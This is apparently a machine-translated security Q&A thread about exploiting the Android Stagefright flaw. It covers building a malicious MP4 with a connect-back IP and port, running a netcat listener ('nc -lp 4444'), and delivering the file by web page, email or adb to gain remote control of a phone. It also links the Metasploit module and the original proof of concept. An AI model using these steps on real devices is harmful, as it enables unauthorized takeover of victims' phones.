我最近对Stagefright做了很多研究,并且已经证实许多运行Android及以下版本的手机都很容易受到攻击。
因此,由于我的S3确实容易受到利用齐姆氏Stagefright检测器应用程序的攻击,所以我决定对其进行测试。
我下载了约书亚·德雷克的stagefright代码(mp4.py),并通过运行以下命令成功地创建了恶意MP4文件:
python mp4.py -c 192.168.x.x -p 4444
C表示局域网IP
P表示端口号
现在,很多在线教程说,在通过彩信将MP4文件发送到目标手机之前,我必须使用netcat设置一个后门。然而,我发现使用metasploit创建一个后门更有效地获得了对电话的完全控制。
我听说您还可以将MP4或其他多媒体文件嵌入到网页中,这样当受害者访问网页时,您就可以像上面提到的那样完全控制电话。
发布于 2017-02-27 14:10:14
你必须在你的电脑上安装netcat,而不是在设备上安装。在侦听模式下为所选端口设置此netcat:
nc -lp 4444
该设备将通过播放伪造的视频文件获得它的netcat。你不需要彩信就能把视频发到电话里。您可以将视频嵌入到网页中,通过电子邮件发送,或者只需使用adb push
命令将其存储在设备上。在此之后,使用标准视频播放器播放视频,您将从您的PC命令行控制设备。
发布于 2017-02-27 19:54:52
尝试Metasploit模块:https://github.com/rapid7/metasploit-framework/pull/4742
另外,来自Josua Drake的原作PoC https://github.com/jduck/cve-2015-1538-1
首先,它不是一个通用的利用。它只在单一的设备模型上进行测试。我的目标是运行Android4.0.4的Galaxy设备,它只包含了ASLR的部分实现。
要在另一个设备上使用它,您必须知道ROP链小工具的libc.so函数地址。
https://security.stackexchange.com/questions/152464
复制相似问题